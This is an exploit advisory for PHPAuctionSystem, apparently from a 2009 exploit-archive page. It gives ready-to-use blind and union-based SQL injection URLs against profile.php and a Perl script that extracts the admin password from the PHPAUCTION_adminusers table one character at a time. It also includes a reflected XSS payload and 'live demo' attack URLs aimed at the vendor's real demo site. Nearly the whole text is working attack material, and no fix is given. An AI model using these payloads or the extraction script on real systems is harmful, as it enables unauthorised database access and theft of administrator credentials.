PHPAuctionSystem (XSS-SQL) Multiple Remote Vulnerabilities
2009-01-05 19:00:29#########################
#PHPAuctionSystem#
#########################
Author:x0r
Email:[email protected]
Cms:PhpAuctionSystemvnew
Cmsprice:$59.99
Demo:http://www.phpauctions.info/demo/
##########################
BugIn:\profile.php(Blind\Normal Sql Injection)
Exploit(Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--
profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
profile.php?user_id=29and+1=0--
profile.php?user_id=29and+1=1--
Perl Exploit:
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put
the victim i've used the demo
my @chars = (48..57, 97..102);
for my $i(1..32) {
foreach my $ord(@chars) {
$a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");
if($a =~ /coucou/i) {#put the username of the user_id=[id]
syswrite(STDOUT,chr($ord));
$i++;
last;
}
}
}
Sql Injection:
profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]
LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=4--[False]
http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=5--[True]
LiveDemo(XSS):
http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>
Live Demo Sql:
http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--
Greetz:MyGirlfriend...
#
Fixes
No fixesIn order to submit a new fix you need to be registered.